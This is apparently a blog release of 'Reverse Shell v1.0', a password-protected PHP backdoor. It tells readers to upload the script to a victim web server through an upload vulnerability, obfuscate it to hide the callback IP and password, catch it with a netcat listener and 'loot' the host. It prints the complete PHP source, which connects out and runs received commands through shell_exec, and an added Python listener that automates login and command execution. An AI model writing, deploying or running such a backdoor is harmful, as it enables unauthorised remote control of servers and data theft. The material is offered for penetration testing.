Reverse Shell v1.0 PHP – Authentication Feature

Introduction

 

This tool is designed for pentest situations where you have upload access to a web server that runs PHP.
Upload the script somewhere under the web root, then run it by requesting its URL in your browser. The script opens an outbound TCP connection from the web server to the host and port defined in the script, and a command shell is bound to that connection.
 

This is a line-based command shell rather than a full interactive terminal: every line you send is run through shell_exec() in a fresh "sh -c" and its output is written back, so interactive programs such as telnet, ssh or vi will not work over it, and a "cd" does not persist from one command to the next.
The shell has an inbuilt authentication feature which stops someone else from using your backdoor: the password must be supplied over the connection before any command is executed.
It differs from web form-based shells, which let you submit a single command per request and return its output.
 

Modify the source

 

$ip = "127.0.0.1"; #Change this to your Public IP
$port = 4444;      #Change this to your Port
$password = base64_decode("aGFja3N5c3RlYW0="); #Default Password: hacksysteam (stored base64-encoded, not hashed)

 

Change the values as per your need and situation. Note that base64 is an encoding, not a hash: anyone who can read the uploaded file on disk recovers both the password and your callback address, which is the reason for the obfuscation step below.
 

Obfuscate The Source

 

Once you have made the modifications, you may use any online PHP obfuscator to encode the script, for example:
 

http://www.codeeclipse.com/
 

Change the values above before obfuscating; an obfuscated file is awkward to edit afterwards, and the obfuscation only hides the IP, port and password from a casual reader of the file, not from anyone willing to deobfuscate it.
 

Setup Netcat Listener

 

Start a Netcat listener on a host and port that the web server can reach (a public IP, or one routable from the target's network).
Use the same port as you specified in the reverse shell script, for example 4444:
 

root@bt:~# nc -lvvp 4444

 

Upload The Script And Execute It

 

Using the upload vulnerability you discovered in the website, upload reverse_shell.php.
Run the script by browsing to the newly uploaded file in your web browser:
 

http://<Victim IP>/<Upload Path>/reverse_shell.php

 

Note: If the connection succeeds you will not see any output on the web page; the request keeps loading, because the script blocks for as long as the shell is open. If the connection fails, the script prints the fsockopen() error number and message in the response instead.
 

Loot with your shell
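
Everything after the connection is made is a plain line protocol: the script sends its banner and "Enter Password: ", reads one line, and then alternates between writing a prompt ending in "# " and running whatever line comes back until it reads "exit". The following Python listener is an added example and is not code from the original post or from HackSys Team. It stands in for "nc -lvvp", answers the password prompt and returns each command's output separately, which is convenient for scripted looting. Because the real PHP side cannot run offline, php_side_stub() is a constructed stand-in that replays the script's message sequence (including the fgets() length limit) with canned output in place of shell_exec(); the stub's user name, working directory and uname line are invented for the demo. Against the real script, bind on your $port and hand the accepted socket to PhpShellSession.

```python
# Added example, not code from the original post: a Python stand-in for "nc -lvvp"
# that answers the PHP script's "Enter Password: " prompt and runs commands for you.
# php_side_stub() is a constructed stand-in for the PHP script so the demo runs offline.
import base64
import socket
import threading

PASSWORD = base64.b64decode("aGFja3N5c3RlYW0=").decode()  # "hacksysteam", as in the script
READ_LIMIT = 1 << 20  # refuse to buffer more than 1 MiB while waiting for a marker

def recv_until(sock, marker):
    """Read until the buffered data ends with `marker` or the peer closes."""
    buf = b""
    while not buf.endswith(marker):
        chunk = sock.recv(4096)
        if not chunk:                       # peer closed, e.g. after "Invalid Password"
            break
        buf += chunk
        if len(buf) > READ_LIMIT:
            raise ValueError("peer sent too much data before the expected marker")
    return buf

class PhpShellSession:
    """One inbound connection from the PHP script: authenticate(), run(), close()."""

    def __init__(self, conn, password=PASSWORD):
        self.conn, self.password = conn, password
        self.prompt = None                  # exact "user@ip:~/path# " learned after login

    def authenticate(self):
        """Answer the password prompt; True iff the script accepts it."""
        recv_until(self.conn, b"Enter Password: ")      # banner, then the prompt
        # The script reads the reply with fgets($sockfd, strlen($password)+2), i.e.
        # at most strlen+1 bytes: send exactly one line and nothing else.
        self.conn.sendall(self.password.encode() + b"\n")
        reply = recv_until(self.conn, b"# ")            # the first command prompt
        if not reply.endswith(b"# ") or b"Authentication Success" not in reply:
            return False                                # "Invalid Password... Quitting..."
        # Later reads stop only on this exact prompt, not on any "# " inside output.
        self.prompt = reply.rsplit(b"\n", 1)[-1]
        return True

    def run(self, command):
        """Send one command line (after authenticate()) and return its output."""
        self.conn.sendall(command.encode() + b"\n")
        data = recv_until(self.conn, self.prompt)
        body = data[:-len(self.prompt)] if data.endswith(self.prompt) else data
        return body.strip(b"\n").decode(errors="replace")

    def close(self):
        """Send the script's 'exit' keyword and return its farewell message."""
        self.conn.sendall(b"exit\n")
        return recv_until(self.conn, b"Exiting...").decode(errors="replace")

def php_side_stub(conn, password=PASSWORD):
    """Constructed stand-in for the PHP script (not its code): same message order and
    fgets() length limit, but canned output instead of shell_exec()."""
    canned = {"id": "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n", "pwd": "/var/www\n"}
    rfile = conn.makefile("rb")
    conn.sendall(b"    Reverse Shell in PHP (stub banner)\n\nEnter Password: ")
    if rfile.readline(len(password) + 1).strip() != password.encode():  # strlen+1 bytes
        conn.sendall(b"\nInvalid Password... Quitting...")
    else:
        conn.sendall(b"\nAuthentication Successful..\nSystem Information: stub\n")
        while True:
            conn.sendall(b"www-data@127.0.0.1:~/var/www# ")
            line = rfile.readline(1337)                 # $len = 1337 in the script
            if not line:                                # EOF: the operator hung up
                break
            cmd = line.strip().decode(errors="replace")
            if cmd == "exit":
                conn.sendall(b"\nAborted by user... Exiting...")
                break
            out = canned.get(cmd, f"sh: 1: {cmd}: not found\n")
            conn.sendall(b"\n" + out.encode() + b"\n")
    rfile.close()
    conn.close()

def demo(password_to_try=PASSWORD, commands=("id", "pwd", "whoami")):
    """Run listener and stub over loopback; returns (authenticated, {command: output})."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))                     # ephemeral port, the nc -lvvp side
    listener.listen(1)
    outbound = socket.create_connection(listener.getsockname())  # the "web server" dials out, as fsockopen() does
    worker = threading.Thread(target=php_side_stub, args=(outbound,), daemon=True)
    worker.start()
    conn, _ = listener.accept()
    conn.settimeout(10)
    try:
        session = PhpShellSession(conn, password_to_try)
        if not session.authenticate():
            return False, {}
        results = {c: session.run(c) for c in commands}
        session.close()
        return True, results
    finally:
        conn.close()
        listener.close()
        worker.join(timeout=5)
```

Two details are worth noting. The client anchors on the complete prompt string it learns after login rather than on a bare "# ", otherwise any "# " inside command output (for example the comment lines of the uploaded script itself, if you cat it) would cut a response short. And because the script reads the password with fgets() limited to strlen($password)+1 bytes, a CRLF line ending from a Windows client still authenticates (trim() drops the "\r", and the leftover "\n" is consumed as an empty first command), but any extra characters on the password line make the comparison fail and the script closes the connection.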

 

Source Code

 

<?php
###################################################
#               Reverse Shell v1.0                #
#             Authentication Feature              #
#                                                 #
#            Hacksys Team - Panthera              #
#             Author: Ashfaq Ansari               #
#            hacksysteam@hotmail.com              #
#          http://hacksys.vfreaks.com             #
#              Designed for Linux                 #
#             Thanks to lionaneesh                #
#             lionaneesh@gmail.com                #
###################################################

ini_set('max_execution_time', 0);   # the request blocks for the whole life of the shell

$VERSION  = "1.0";
$ip       = "127.0.0.1"; #Change this
$port     = 4444;        #Change this
$password = base64_decode("aGFja3N5c3RlYW0="); #Default Password: hacksysteam (base64-encoded, not hashed)

$banner = ("
 _    _            _     _____            
| |  | |          | |   / ____|                            
| |__| | __ _  ___| | _| (___  _   _ ___
|  __  |/ _` |/ __| |/ /\___ \| | | / __|
| |  | | (_| | (__|   < ____) | |_| \__ \
|_|  |_|\__,_|\___|_|\_\_____/ \__, |___/
 _______                        __/ |                                
|__   __|                      |___/  
   | | ___  __ _ _ __ ___  
   | |/ _ \/ _` | '_ ` _ \
   | |  __/ (_| | | | | | |
   |_|\___|\__,_|_| |_| |_|
   
    Reverse Shell in PHP
    Author: Ashfaq Ansari
   hacksysteam@hotmail.com
 http://hacksys.vfreaks.com/\n\n"
);

# Gathered once, with the web server's account. $id is the user name
# (e.g. www-data), cut out of "uid=33(www-data) gid=33(www-data) ...".
$pwd     = shell_exec("pwd");
$sysinfo = shell_exec("uname -a");
$id      = shell_exec('id | cut -d "(" -f 2 | cut -d ")" -f 1');
$date    = shell_exec("date");
$len     = 1337;   # maximum length of one command line read with fgets()
$info =
("
System Information:\n$sysinfo
Current Working Directory: $pwd
User: $id
Current Date and Time: $date\n
"
);

print "\nTrying to connect to: $ip on port $port ...\n\n";

$sockfd = fsockopen($ip, $port, $errno, $errstr);

if ($errno != 0)
  {
    print "\n****** Error Occurred ******\nError Number: $errno\nError String: $errstr\n\n";
    die(0);
  }
else if (!$sockfd)
  {
    print "Fatal: An unexpected error occurred when trying to connect!\n";
    die(0);
  }
else
  {
    print "Connected to: $ip on port $port ...\n\n";
    fputs($sockfd, $banner);
    fputs($sockfd, "Enter Password: ");
    # fgets() returns at most strlen($password)+1 bytes: the password and its newline.
    $getpass = trim(fgets($sockfd, strlen($password) + 2));

    if ($getpass === $password)   # strict comparison, no type juggling of numeric-looking strings
    {
      fputs($sockfd, "\nAuthentication Successful..\n");
      fputs($sockfd, $info);
      while (!feof($sockfd))
      {
        $cmdPrompt = trim($id) . "@" . trim($ip) . ":~" . trim($pwd) . "# ";
        fputs($sockfd, $cmdPrompt);
        $command = trim(fgets($sockfd, $len));
        if ($command == "exit")
        {
          fputs($sockfd, "\nAborted by user... Exiting...");
          fclose($sockfd);
          die(0);
        }
        # Each command runs in its own "sh -c": "cd" does not persist and
        # interactive programs (telnet, ssh, vi) will not work over this loop.
        fputs($sockfd, "\n" . shell_exec($command) . "\n");
      }
      fclose($sockfd);
      die(0);
    }
    else
    {
      fputs($sockfd, "\nInvalid Password... Quitting...");
      fclose($sockfd);
      die(0);
    }
  }
?>

 


Download Reverse Shell v1.0 PHP – Authentication Feature

 

File: Reverse_Shell_v1.0.zip

Ashfaq Ansari

Security Researcher
Ashfaq Ansari is the founder of HackSys Team code named "Panthera". He is a Security Researcher with experience in various aspects of Information Security. He has authored "HackSys Extreme Vulnerable Driver" and "Shellcode of Death". He has also written and published various whitepapers on low level software exploitation. His core interest lies in "Low Level Exploitation", "Reverse Engineering", "Program Analysis" and "Hybrid Fuzzing". He is a fanboy of Artificial Intelligence and Machine Learning. He is the chapter lead for null Pune.